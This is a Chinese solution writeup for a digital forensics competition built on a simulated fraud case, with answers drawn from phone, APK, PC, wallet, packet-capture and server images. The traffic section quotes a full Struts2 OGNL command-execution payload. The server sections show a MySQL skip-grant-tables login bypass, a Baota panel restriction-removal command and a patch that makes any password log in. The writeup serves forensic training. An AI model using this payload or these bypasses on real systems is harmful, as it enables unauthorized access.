第一届龙信杯电子数据取证竞赛Writeup

admin 2024年4月23日06:38:41评论5 views字数 16413阅读54分42秒阅读模式
非常贴近实战,适合文中引用某公安办案实例。三个半小时的个人赛,73道题单兵作战,搜藏整理WP义工学习

参考文章链接:

https://mp.weixin.qq.com/s/C9qIR9Em73kVm6b6WCXKpw

(公众号:XiAnG学安全)

https://blog.csdn.net/jyttttttt/article/details/133277186

(作者:是toto)

检材链接:https://pan.baidu.com/s/1ITyZI5uZHrvF7ara0JRNzQ?pwd=8a0z 容器密码:RLEQc2Xe65Q5GiCuRNMFrw==

比武题目

个人思路仅供参考~有问题可以联系我或者评论

00

案情简介

      2023年9月,某公安机关指挥中心接受害人报案:通过即时通讯工具添加认识一位叫“周微”的女人,两人谈论甚欢,确定网上恋爱关系,后邀约裸聊,受害人上钩后,“周微”和受害人进行裸聊,整个过程被涉诈团伙录音录像。同时周倩以自己做直播“涨粉”为由,引导受害人下载其事先制作好的木马APP,受害人安装该APP后,嫌疑人利用录制的视频和受害人的通讯录做要挟,从而实施诈骗。

       公安机关接警后,通过技术手段抓取了一段流量包,且通过公安机关的侦查与分析,锁定了该诈骗团伙的业务窝点,具了解,该团伙成员通过Telegram 联系ETH币商收币,双方在线上确定好了交易时间和交易金额(交易额为300万人民币),并先由卖币方转0.5个ETH到买币方钱包。双方人员碰头后,商定分两笔交易交割,第一笔交易价值100万的虚拟货币、第二笔交易价值200万的虚拟货币。第一笔100万的币从卖币方的地址转到中转地址(由中间人控制),再由中转地址转到买币方提供的收币地址,买币方收到币后将带来的100万现金给卖币方清点,第一笔交易完成。 犯罪分子开始第二笔交易时,被警方当场截获。并将相关嫌疑人抓获,扣押安卓手机1部,笔记本电脑1台,调证服务器2台,以上检材以分别制作了镜像。检材清单见附件。请结合案情,对上述检材进行勘验与分析,完成以下题目。

第一届龙信杯电子数据取证竞赛Writeup

01


题目目录

  • 移动终端取证

    • 1.请分析涉案手机的设备标识是_______。(标准格式:12345678)

    • 2.请确认嫌疑人首次安装目标APP的安装时间是______。(标准格式:2023-09-13.11:32:23)

    • 3.此检材共连接过______个WiFi。(标准格式:1)

    • 4.嫌疑人手机短信记录中未读的短信共有______条。(标准格式:12)

    • 5.嫌疑人检材手机在浏览器中下载海报背景图的网址是_______。(标准格式:http://www.baidu.com/admin/index.html)

    • 6.请分析涉案海报的推广ID是________。(标准格式:123456)

    • 7.嫌疑人通过短信群发去推广APP,请问收件人中有__个号码是无效的。(标准格式:12)

    • 8.通过分析,嫌疑人推送的微信账号是______。(标准格式:Lx20230916)

    • 9.请校验嫌疑人使用的“变声器”APK的包名是________。(标准格式:com.baidu.com)

    • 10.号商的联系人注册APP的ID是_________。(标准格式:12345678)

    • 11.嫌疑人于2022年11月份在_______城市。(标准格式:成都)

    • 12.嫌疑人共购买_______个QQ号。(标准格式:1)

  • APK取证

    • 1.分析手机镜像,导出涉案apk,此apk的md5值是________。(标准格式:abc123)

    • 2.分析该apk,apk的包名是________。(标准格式:com.qqj.123)

    • 3.分析该apk,app的内部版本号是__________。(标准格式:1.1)

    • 4.分析该apk,请问该apk最高支持运行的安卓版本是_______。(标准格式:11)

    • 5.分析该apk,app的主函数入口是_________。(标准格式:com.qqj.123.MainActivity)

    • 6.分析该apk,请问窃取短信的权限名称是________。(标准格式:android.permission.NETWORK)

    • 7.APP使用的OPPO的appkey值是________。(标准格式:AB-12345678)

    • 8.分析apk源码,该APK后台地址是________。(标准格式:com.qqj.123)

    • 9.分析apk源码,APP 后台地址登录的盐值是_______。(标准格式:123abc=%$&)

    • 10.分析apk源码,该APK后台地址登录密码是______。(标准格式:longxin123)

    • 11.对 APP 安装包进行分析,该 APP打包平台调证值是______。(标准格式:HER45678)

    • 12.此apk抓包获取到的可访问网站域名IP地址是_______。(标准格式:192.168.1.1)

    • 13.分析apk源码,该apk的加密方式key值是________。(标准格式:12345678)

    • 14.结合计算机镜像,综合分析,请问该apk开发者公司的座机号码是__。(标准格式:4001122334)

  • 介质取证

    • 1.对PC镜像分析,请确定涉案电脑的开机密码是_______。(标准格式:123456)

    • 2.涉案计算机最后一次正常关机时间_______。(标准格式:2023-1-11.11:11:11)

    • 3.分析涉案计算机,在2022年11月4日此电脑共开机时长为_______。(标准格式:1小时1分1秒)

    • 4.对PC镜像分析,请确认微信是否是开机自启动程序。(标准格式:是/否)

    • 5.检材硬盘中有一个加密分区,给出其中“我的秘密.jpg”文档的解密内容。(标准格式:Longxin0924)

    • 6.接上题,请问该嫌疑人10月份工资是_______元。(标准格式:123)

    • 7.对PC镜像进行分析,浏览器中使用过QQ邮箱,请问该邮箱的密码是______。(标准格式:Longxin0924)

    • 8.结合手机镜像分析,得出一个推广ID,请在此检材找到此海报,请写出路径。(标准格式:D:XX1.txt)

    • 9.请找出嫌疑人的2022年收入共_______。(标准格式:123)

    • 10.分析此海报,请找到嫌疑人的银行卡号。(标准格式:62225123456321654)

  • 虚拟币分析

    • 1.分析涉案计算机,正确填写中转地址当前的代币种类______。(标准格式:BNB)

    • 2.分析涉案计算机,正确填写中转地址当前的代币余额数量_______。(标准格式:1.23)

    • 3.根据中转地址转账记录找出买币方地址。买币方地址:_____(标准格式:0x123ABC)

    • 4.根据中转地址转账记录统计买方地址转账金额。转账金额:____ ETH.(标准格式:12.3)

    • 5.在创建钱包时,应用APP都会建议我们进行助记词备份,方便以后忘记密码后找回钱包,在办案过程中时常会拿到犯罪嫌疑人备份的助记词的情况。请从以下三组助记词中判断出格式正确的一组( )

    • 6.假设上题中正确的助记词为通过侦察找到的嫌疑人钱包助记词备份(已知地址属于以太坊链),请在模拟器中通过imToken APP恢复嫌疑人钱包,并选出正确钱包地址( )

  • 流量分析

    • 1.分析“数据包1.cap”,请问客户端为什么访问不了服务器。( )

    • 2.分析“数据包1.cap”,出问题的服务器IP地址是_______。(格式:127.0.0.1)

    • 3.分析“数据包1.cap”,文件下发服务器的IP地址是_______。(标准格式:127.0.0.1)

    • 4.分析“数据包1.cap”,攻击者利用_______漏洞进行远程代码执行。(标准格式:XXX)

    • 5.分析“数据包1.cap”,请提取恶意文件,并校验该文件的MD5值为_______。(标准格式:abcd)

    • 6.分析“数据包2.cap”,其获取文件的路径是________。(标准格式:D:/X/X/1.txt)

    • 7.分析“数据包2.cap”,文件下载服务器的认证账号密码是_______。(标准格式:123)

    • 8.分析“数据包2.cap”,其下载的文件名大小有________字节。(标准格式:123)

  • 服务器取证1

    • 1.服务器系统的版本号是_______。(格式:1.1.1111)

    • 2.网站数据库的版本号是_______。(格式:1.1.1111)

    • 3.宝塔面板的“超时”时间是_______分钟。(格式:50)

    • 4.网站源码备份压缩文件SHA256值是_______。(格式:64位小写)

    • 5.分发网站sb.wiiudot.cn管理员密码默认MD5加密盐值是_______。(格式:abcd)

    • 网站重构

    • 6.分发网站sb.wiiudot.cn一共存放了_______条通讯录数据。(标准格式:1234)

    • 7.全部网站一共有_______名受害人。(格式:xxx。不去重,不进行数据恢复)

    • 8.分发网站tf.chongwuxiaoyouxi.com里面一共有_______位“组员级别”的管理员。(格式:数字)

    • 9.分发网站sb.wiiudot.cn管理员名为“0820”的邀请码是_______。(格式:xxx)

    • 10.分发网站sb.wiiudot.cn本地数据库用户sb_wiiudot_cn的密码是_______。(格式:xxx)

  • 服务器取证2

    • 1.请分析宝塔面板中默认建站目录是_______。(标准格式:/etc/www)

    • 2.在宝塔数据库目录有一个只含有一个表结构的数据库,请找到该“表结构文件”并分析出第六个字段的字段类型是_______。(标准格式:int(11))

    • 3.请分析“乐享金融”网站绑定的域名是_______。(标准格式:www.baidu.com)

    • 4.请访问“乐享金融”数据库并找到用户表,假设密码为123456,还原uid为2909,用户名为goyasha加密后密码的值是_______。(标准格式:abcdefghijklmnopqrstuvwsyz)

    • 关于网站重构

    • 5.请重建“乐享金融”,访问平台前台登陆界面,会员登陆界面顶部LOGO上的几个字是_______。(标准格式:爱金融)

    • 6.请分析“乐享金融”一共添加了_______个非外汇产品。(标准格式:5)

    • 7.请分析“乐享金融”设置充值泰达币的地址是_______。(标准格式:EDFGF97B46234FDADSDF0270CB3E)

    • 8.请分析“乐享金融”充值金额大于582402元的受害人充值总金额是_______。(标准格式:12345678)

    • 9.请分析“乐享金融”银行卡号“6239039472846284913”绑定用户的用户名是_______。(标准格式:张三)

    • 10.请分析“乐享金融”建仓时间为“2022/03/01 18:44:01”,平仓时间为“2022/03/01 18:52:01”,以太坊/泰达币的这一笔交易的平仓价格是_______。(标准格式:1888.668)

    • 11.请分析“乐享金融”订单编号为“202112090946233262”平仓时间是_______。(标准格式:2022-1-11.1:22:43)

    • 12.宝塔面板某用户曾尝试进行一次POST请求,参数为“/BTCloud?action=UploadFilesData”,请问该用户疑似使用的( )电脑系统进行访问请求的。

    • 13.请分析该服务器镜像最高权限“root”账户的密码是_______。(标准格式:a123456)

02


移动终端取证

1.请分析涉案手机的设备标识是_______。(标准格式:12345678)

85069625

软件一把梭,不多说了

第一届龙信杯电子数据取证竞赛Writeup

2.请确认嫌疑人首次安装目标APP的安装时间是______。(标准格式:2023-09-13.11:32:23)

2022-11-16.19:11:26
  • 1

聊天记录拿到apk名字

第一届龙信杯电子数据取证竞赛Writeup

翻一翻应用列表即可

第一届龙信杯电子数据取证竞赛Writeup

3.此检材共连接过______个WiFi。(标准格式:1)

6
  • 1

第一届龙信杯电子数据取证竞赛Writeup

4.嫌疑人手机短信记录中未读的短信共有______条。(标准格式:12)

17
  • 1

软件解析不出来,手动翻数据库datacom.android.providers.telephonydatabasesmmssms.db

sms表中未读read字段为0

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

5.嫌疑人检材手机在浏览器中下载海报背景图的网址是_______。(标准格式:http://www.baidu.com/admin/index.html)

http://m.ziyuanhu.com/pics/1725.html
  • 1

第一届龙信杯电子数据取证竞赛Writeup

6.请分析涉案海报的推广ID是________。(标准格式:123456)

114092
  • 1

第一届龙信杯电子数据取证竞赛Writeup

7.嫌疑人通过短信群发去推广APP,请问收件人中有__个号码是无效的。(标准格式:12)

1
  • 1

第一届龙信杯电子数据取证竞赛Writeup

8.通过分析,嫌疑人推送的微信账号是______。(标准格式:Lx20230916)

Gq20221101
  • 1

第一届龙信杯电子数据取证竞赛Writeup

9.请校验嫌疑人使用的“变声器”APK的包名是________。(标准格式:com.baidu.com)

com.chuci.voice
  • 1

第一届龙信杯电子数据取证竞赛Writeup

10.号商的联系人注册APP的ID是_________。(标准格式:12345678)

36991915
  • 1

第一届龙信杯电子数据取证竞赛Writeup

11.嫌疑人于2022年11月份在_______城市。(标准格式:成都)

苏州
  • 1

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

12.嫌疑人共购买_______个QQ号。(标准格式:1)

8
  • 1

第一届龙信杯电子数据取证竞赛Writeup

03


APK取证

APK取证

apk前面已经找到过了,导出来就行

1.分析手机镜像,导出涉案apk,此apk的md5值是________。(标准格式:abc123)

d56e1574c1e48375256510c58c2e92e5
  • 1

2.分析该apk,apk的包名是________。(标准格式:com.qqj.123)

lx.tiantian.com
  • 1

3.分析该apk,app的内部版本号是__________。(标准格式:1.1)

1.0
  • 1

第一届龙信杯电子数据取证竞赛Writeup

4.分析该apk,请问该apk最高支持运行的安卓版本是_______。(标准格式:11)

12
  • 1

manifest看到的sdk版本32,对应Android12

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

5.分析该apk,app的主函数入口是_________。(标准格式:com.qqj.123.MainActivity)

lx.tiantian.com.activity.MainActivity
  • 1

第一届龙信杯电子数据取证竞赛Writeup

6.分析该apk,请问窃取短信的权限名称是________。(标准格式:android.permission.NETWORK)

android.permission.READ_SMS
  • 1

没啥意思的题目,翻源码根本都没看到在读短信
第一届龙信杯电子数据取证竞赛Writeup

7.APP使用的OPPO的appkey值是________。(标准格式:AB-12345678)

OP-264m10v633PC8ws8cwOOc4c0w
  • 1

第一届龙信杯电子数据取证竞赛Writeup

8.分析apk源码,该APK后台地址是________。(标准格式:com.qqj.123)

app.goyasha.com
  • 1

主函数里

第一届龙信杯电子数据取证竞赛Writeup

9.分析apk源码,APP 后台地址登录的盐值是_______。(标准格式:123abc=%$&)

73g=s%!lvi8h=i7a4ge*o3s@h2n^5_yk=-y#@p6)feidfjol8@
  • 1

10.分析apk源码,该APK后台地址登录密码是______。(标准格式:longxin123)

lxtiantiancom
  • 1

搜一下admin,login这种关键词就能找到了

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

11.对 APP 安装包进行分析,该 APP打包平台调证值是______。(标准格式:HER45678)

H5D9D11EA
  • 1

AndroidManifest里

第一届龙信杯电子数据取证竞赛Writeup

12.此apk抓包获取到的可访问网站域名IP地址是_______。(标准格式:192.168.1.1)

192.168.5.80
  • 1

手翻是翻的出来的,抓包是没抓着的

第一届龙信杯电子数据取证竞赛Writeup

都没被引用过这能抓得着的??

第一届龙信杯电子数据取证竞赛Writeup

13.分析apk源码,该apk的加密方式key值是________。(标准格式:12345678)

ade4b1f8a9e6b666
  • 1

搜一下AES就行了,或者手动翻翻也翻的到,跟后台写在一个包里

第一届龙信杯电子数据取证竞赛Writeup

14.结合计算机镜像,综合分析,请问该apk开发者公司的座机号码是__。(标准格式:4001122334)

4008522366
  • 1

做到后面到pc的最后几题了再分析,留个坑

04


介质取证

介质取证

1.对PC镜像分析,请确定涉案电脑的开机密码是_______。(标准格式:123456)

Longxin360004
  • 1

用龙信的仿起来会有密码提示,火眼仿起来密码会直接绕过去了

提示要个工号

第一届龙信杯电子数据取证竞赛Writeup

微信传过一个工资条,里面有工号

第一届龙信杯电子数据取证竞赛Writeup

2.涉案计算机最后一次正常关机时间_______。(标准格式:2023-1-11.11:11:11)

2023-09-16.18:20:34
  • 1

第一届龙信杯电子数据取证竞赛Writeup

3.分析涉案计算机,在2022年11月4日此电脑共开机时长为_______。(标准格式:1小时1分1秒)

  • 1

不知道官方到底咋考虑的,我反正把五个时间都算上了

第一届龙信杯电子数据取证竞赛Writeup

4.对PC镜像分析,请确认微信是否是开机自启动程序。(标准格式:是/否)


  • 1

第一届龙信杯电子数据取证竞赛Writeup

5.检材硬盘中有一个加密分区,给出其中“我的秘密.jpg”文档的解密内容。(标准格式:Longxin0924)

Mimi1234
  • 1

bitlocker一把梭

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

6.接上题,请问该嫌疑人10月份工资是_______元。(标准格式:123)

19821
  • 1

这里前面那个直接找到的工资条出来的工资填进去是错的

用上一题的密码解工资条同目录下的那个加密压缩包,解出来的工资条才是正确的

第一届龙信杯电子数据取证竞赛Writeup

后面会有题目能反向印证

第一届龙信杯电子数据取证竞赛Writeup

7.对PC镜像进行分析,浏览器中使用过QQ邮箱,请问该邮箱的密码是______。(标准格式:Longxin0924)

Longxin@2023
  • 1

只有龙信的仿起来浏览器里才有密码,火眼这个密码也会被抹掉

第一届龙信杯电子数据取证竞赛Writeup

8.结合手机镜像分析,得出一个推广ID,请在此检材找到此海报,请写出路径。(标准格式:D:XX1.txt)

C:Program Files (x86)TencentWeChat2.png
  • 1

访问记录里找到个mmm.txt

第一届龙信杯电子数据取证竞赛Writeup

推广id对的上,后面给了两个海报的路径分别是1.png和2.png

ps:同目录下的blmm.TXT是bitlocker密码

第一届龙信杯电子数据取证竞赛Writeup

都导出来可以发现哈希是不一样的

ctf做题法,2的文件尾有串银行卡,对应是第十题的答案,因此2.png才是题目要的(虽然他们文件结构是jpg来着)

第一届龙信杯电子数据取证竞赛Writeup

ps:前面访问记录看到的老秘密去全局搜可以在回收站了里恢复出来

第一届龙信杯电子数据取证竞赛Writeup

是个建行银行卡密码,但是不是第10题的答案,容易被误导

第一届龙信杯电子数据取证竞赛Writeup

9.请找出嫌疑人的2022年收入共_______。(标准格式:123)

205673
  • 1

前面bitlocker解开可以发现还有个dd容器

第一届龙信杯电子数据取证竞赛Writeup

仿真起来桌面有个TrueCrypt,所以是tc容器

然后又是西提艾福做题法,用前面找到的海报当作密钥文件就能挂载了,,

第一届龙信杯电子数据取证竞赛Writeup

然后这里会发现还是找不到这道题的答案,拿火眼挂载磁盘发现原文件已经被删了

第一届龙信杯电子数据取证竞赛Writeup

$RECYCLE.BIN里还是可以找到的,导出来算一下就行了

这个工资表里同样也反向印证前面十月份的工资答案

第一届龙信杯电子数据取证竞赛Writeup

x-way挂载起来可以直接看,倒都不用去找了

第一届龙信杯电子数据取证竞赛Writeup

然后开始给前面题目填坑,首先是apk的座机号码,又很西提艾福的感觉

第一届龙信杯电子数据取证竞赛Writeup

一眼感觉AES,想到之前apk里也有aes,用apk里的key和iv解一下

第一届龙信杯电子数据取证竞赛Writeup

10.分析此海报,请找到嫌疑人的银行卡号。(标准格式:62225123456321654)

6320005020052013476
  • 1

前面分析过了

第一届龙信杯电子数据取证竞赛Writeup

05


虚拟币分析

虚拟币分析

前面的容器里还有个夜神模拟器的备份

ps:套神做题法,这个pc都没删干净,传个everything上去,按大小排序,pc里可以翻出来这个npbk

第一届龙信杯电子数据取证竞赛Writeup

这个备份文件本质是个zip,改一下后缀解压就能把vmdk解出来扔取证软件里分析了

1.分析涉案计算机,正确填写中转地址当前的代币种类______。(标准格式:BNB)

ETH
  • 1

第一届龙信杯电子数据取证竞赛Writeup

2.分析涉案计算机,正确填写中转地址当前的代币余额数量_______。(标准格式:1.23)

0
  • 1

很诡异,仿真起来是0

第一届龙信杯电子数据取证竞赛Writeup

以太坊查了一下也是 0

第一届龙信杯电子数据取证竞赛Writeup

3.根据中转地址转账记录找出买币方地址。买币方地址:_____(标准格式:0x123ABC)

0x63AA203086938f82380A6A3521cCBf9c56d111eA
  • 1

4.根据中转地址转账记录统计买方地址转账金额。转账金额:____ ETH.(标准格式:12.3)

150.5
  • 1

有仨交易记录

根据案情先由卖币方转0.5个ETH到买币方钱包,模拟器中的钱包地址是卖币方的,命名为中转地址是一个挖坑的点,0.5ETH是直接转到买币方地址,其他两笔是转给中间人的

火眼直接取出来的交易金额不对

第一届龙信杯电子数据取证竞赛Writeup

这个搞不出来,抄抄了

听说是联网这个数据就会被删,刚仿真起来直接关掉wifi再打开这个app可能就会有吧

第一届龙信杯电子数据取证竞赛Writeup

5.在创建钱包时,应用APP都会建议我们进行助记词备份,方便以后忘记密码后找回钱包,在办案过程中时常会拿到犯罪嫌疑人备份的助记词的情况。请从以下三组助记词中判断出格式正确的一组( )

A.raw sausage art hub inspire dizzy funny exile local middle shed primary

B.raw sausage art hub inspire dizzy funny middle shed primary

C.raw sausage art funny exile local middle shed primary

A
  • 1

emmm,直接chatgpt做题法就好了

第一届龙信杯电子数据取证竞赛Writeup

6.假设上题中正确的助记词为通过侦察找到的嫌疑人钱包助记词备份(已知地址属于以太坊链),请在模拟器中通过imToken APP恢复嫌疑人钱包,并选出正确钱包地址( )

0x63AA203086938f82380A6A3521cCBf9c56d111eA
  • 1

前面交易记录里已经提到这个地址了

恢复一下也行,添加钱包,助记词

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

06


流量分析

流量分析

1.分析“数据包1.cap”,请问客户端为什么访问不了服务器。( )

A.DDoS攻击

B.DoS攻击

C.SQL注入

D.文档攻击

B
  • 1

数据包有点大,拿科莱分析一下

显然10.5.0.19被116.211.168.203爆破了,一台攻击机,dos

第一届龙信杯电子数据取证竞赛Writeup

2.分析“数据包1.cap”,出问题的服务器IP地址是_______。(格式:127.0.0.1)

10.5.0.19
  • 1

由上图得是10.5.0.19,但是错了,,不知道是哪个答案

3.分析“数据包1.cap”,文件下发服务器的IP地址是_______。(标准格式:127.0.0.1)

120.210.129.29
  • 1

见下一题的分析

4.分析“数据包1.cap”,攻击者利用_______漏洞进行远程代码执行。(标准格式:XXX)

struts2
  • 1

流量包1太大了,先http筛选一下然后导出分组结果,追踪流起来比较方便

第一届龙信杯电子数据取证竞赛Writeup

流600开始就开始反复构造下面的payload在测可利用的ip和端口

%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo Windows2017-1'}:{'/bin/bash','-c','Linux2017-1'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host: 202.104.138.26:8080
  • 1

  • 2

GPT做题法
第一届龙信杯电子数据取证竞赛Writeup

流839成功利用,ip端口为202.104.142.58:8088

第一届龙信杯电子数据取证竞赛Writeup

流840,841测了一下防火墙,843wget下载了一个java.log,得到前一题的文件下发服务器ip120.210.129.29

第一届龙信杯电子数据取证竞赛Writeup

844拿到java.log的内容

第一届龙信杯电子数据取证竞赛Writeup

导出来

第一届龙信杯电子数据取证竞赛Writeup

5.分析“数据包1.cap”,请提取恶意文件,并校验该文件的MD5值为_______。(标准格式:abcd)

87540c645d003e6eebf1102e6f904197
  • 1

如上图

6.分析“数据包2.cap”,其获取文件的路径是________。(标准格式:D:/X/X/1.txt)

C:/Users/Administrator/Downloads/新建文件夹/新建文件夹/mail.png
  • 1

第一届龙信杯电子数据取证竞赛Writeup

白给的,解不出来中文再贴个textdecode utf-8就好了

第一届龙信杯电子数据取证竞赛Writeup

7.分析“数据包2.cap”,文件下载服务器的认证账号密码是_______。(标准格式:123)

admin:passwd
  • 1

流0认证401错了,流2后面才对

第一届龙信杯电子数据取证竞赛Writeup

8.分析“数据包2.cap”,其下载的文件名大小有________字节。(标准格式:123)

211625
  • 1

挺无语,比赛过程微信群里通知,也不@一下,根本没看到,题目临时改成文件大小了

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

服务器取证1

1.服务器系统的版本号是_______。(格式:1.1.1111)

7.9.2009
  • 1

第一届龙信杯电子数据取证竞赛Writeup

2.网站数据库的版本号是_______。(格式:1.1.1111)

5.6.50
  • 1

第一届龙信杯电子数据取证竞赛Writeup

3.宝塔面板的“超时”时间是_______分钟。(格式:50)

120
  • 1

这个宝塔开了一堆访问限制,这几个好像都开了,其中23好像就是对应访问的时候会弹个前端认证

第一届龙信杯电子数据取证竞赛Writeup

全关了就好了

cp -r /www/backup/panel/ /root/ && cp -r /www/server/panel/data/ /root && rm -f /www/server/panel/data/close.pl &&bt default && bt 23 && bt 11 && bt 12 && bt 13 && bt 24 && bt 5 && bt default
  • 1

第一届龙信杯电子数据取证竞赛Writeup

4.网站源码备份压缩文件SHA256值是_______。(格式:64位小写)

0bdeeacf755126dae9efd38f6a6d70323aa95217b629fd389e0e81f9b406be39
  • 1

backup目录下

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

5.分发网站sb.wiiudot.cn管理员密码默认MD5加密盐值是_______。(格式:abcd)

7f5918fe56f4a01d8b206f6a8aee40f2
  • 1

这里可以找到盐值,直接填明文是错的

第一届龙信杯电子数据取证竞赛Writeup

看这个加密方式,应该是这串字符md5后的值

第一届龙信杯电子数据取证竞赛Writeup

可以验证一下,123456加密后的值是9eb2b9ad495a75f80f9cf67ed08bbaae

第一届龙信杯电子数据取证竞赛Writeup

可以找到一个对应值

第一届龙信杯电子数据取证竞赛Writeup

网站重构

这个网站重构还挺简单的,宝塔先挂个域名上去

第一届龙信杯电子数据取证竞赛Writeup

直接访问/admin会报错

第一届龙信杯电子数据取证竞赛Writeup

改一下config.php的show_error_msg字段为True,弹一下报错信息

第一届龙信杯电子数据取证竞赛Writeup

这里应该会弹一个mysql连接一个47.几的ip好像,要改一下mysql的地址,我这里已经改过了

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

提示mysql密码错了,直接绕过密码登录,/etc/my.cnf加个skip-grant-table字段,service mysql restart重启一下mysql服务

第一届龙信杯电子数据取证竞赛Writeup

到后台了

第一届龙信杯电子数据取证竞赛Writeup

这里可以直接用之前123456得到的密码9eb2b9ad495a75f80f9cf67ed08bbaae覆盖掉admin密码字段就可以直接admin/123456登录了

这里用我赛时的做法是直接绕登录逻辑

找登录逻辑的文件直接手动翻也行,我这里去找报错字段

随便登一下,提示密码错误

第一届龙信杯电子数据取证竞赛Writeup

把整套源码导出来,然后搜一下关键词即可

第一届龙信杯电子数据取证竞赛Writeup

直接不等于改成等于就完事了,任意密码登录

第一届龙信杯电子数据取证竞赛Writeup

tf那个站还要多配个伪静态,把sb的伪静态直接贴过来就行,都是一个框架的

第一届龙信杯电子数据取证竞赛Writeup

6.分发网站sb.wiiudot.cn一共存放了_______条通讯录数据。(标准格式:1234)

  • 1

67097错了emmm挺懵逼的,不知道答案是啥

第一届龙信杯电子数据取证竞赛Writeup

7.全部网站一共有_______名受害人。(格式:xxx。不去重,不进行数据恢复)

506
  • 1

这里不去重是指三个网站之间的数据不去重,单个网站内还是要去重的,,

第一届龙信杯电子数据取证竞赛Writeup

tf绑的是sanye123这个库
第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

wiiudot绑的是0731这个库,三段数据加一下就好了

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

8.分发网站tf.chongwuxiaoyouxi.com里面一共有_______位“组员级别”的管理员。(格式:数字)

26
  • 1

第一届龙信杯电子数据取证竞赛Writeup

9.分发网站sb.wiiudot.cn管理员名为“0820”的邀请码是_______。(格式:xxx)

443074
  • 1

网站仿起来也找不到,还是得手翻数据库,在app_adminapp_appconfig两张表里

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

mysql改一下地址

第一届龙信杯电子数据取证竞赛Writeup

10.分发网站sb.wiiudot.cn本地数据库用户sb_wiiudot_cn的密码是_______。(格式:xxx)

KE5f3xnFHYAnG5Dt
  • 1

之前重构的时候就发现database.php里的密码是错的了

备份文件里的database的密码是对的,挺无语的

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

08


服务器取证2

服务器取证2

1.请分析宝塔面板中默认建站目录是_______。(标准格式:/etc/www)

/home/wwwroot
  • 1

这个bt没给内网ip登录,不过无所谓,外网端口是默认8888,内网照着抄抄就好http://服务器ip:8888/login

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

2.在宝塔数据库目录有一个只含有一个表结构的数据库,请找到该“表结构文件”并分析出第六个字段的字段类型是_______。(标准格式:int(11))

char(128)
  • 1

还有一个库也只有一张表,但是列没有6个

第一届龙信杯电子数据取证竞赛Writeup

3.请分析“乐享金融”网站绑定的域名是_______。(标准格式:www.baidu.com)

jinrong.goyasha.com
  • 1

第一届龙信杯电子数据取证竞赛Writeup

4.请访问“乐享金融”数据库并找到用户表,假设密码为123456,还原uid为2909,用户名为goyasha加密后密码的值是_______。(标准格式:abcdefghijklmnopqrstuvwsyz)

d2174d958131ebd43bf900e616a752e1
  • 1

找一下密码加密逻辑,就是拼接明文密码和utime之后md5,utime是在第一次添加该用户的时候的时间戳写死的

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

数据库翻一下,userinfo表里找到utime

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

关于网站重构

这里留个坑,运行目录是/public

第一届龙信杯电子数据取证竞赛Writeup

但是可以发现public下面index.php和route.php都没,当然直接从服务器1那边拖两个进来是无济于事的

第一届龙信杯电子数据取证竞赛Writeup

5.请重建“乐享金融”,访问平台前台登陆界面,会员登陆界面顶部LOGO上的几个字是_______。(标准格式:爱金融)

睿文化
  • 1

重构不起来,就手动翻

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

6.请分析“乐享金融”一共添加了_______个非外汇产品。(标准格式:5)

2
  • 1

wp_productclass表里看到pcid 5是外汇

第一届龙信杯电子数据取证竞赛Writeup

wp_productinfo再要注意isdelete被删除的字段,没被删除的非外汇总共2

第一届龙信杯电子数据取证竞赛Writeup

第一届龙信杯电子数据取证竞赛Writeup

7.请分析“乐享金融”设置充值泰达币的地址是_______。(标准格式:EDFGF97B46234FDADSDF0270CB3E)

85CF33F97B46A88C7386286D0270CB3E
  • 1

wp_rcset

第一届龙信杯电子数据取证竞赛Writeup

8.请分析“乐享金融”充值金额大于582402元的受害人充值总金额是_______。(标准格式:12345678)

101000087
  • 1

充值记录在wp_price_log表内,这道题存疑

第一届龙信杯电子数据取证竞赛Writeup

9.请分析“乐享金融”银行卡号“6239039472846284913”绑定用户的用户名是_______。(标准格式:张三)

kongxin
  • 1

wp_bankcard可以看到,但不是张教瘦我也是醉了

这里有个坑,查出来对应的uid是2917

第一届龙信杯电子数据取证竞赛Writeup

wp_userinfo表里可以看到uid 2917对应的username是kongxin

第一届龙信杯电子数据取证竞赛Writeup

10.请分析“乐享金融”建仓时间为“2022/03/01 18:44:01”,平仓时间为“2022/03/01 18:52:01”,以太坊/泰达币的这一笔交易的平仓价格是_______。(标准格式:1888.668)

2896.924
  • 1

交易记录在wp_order表里

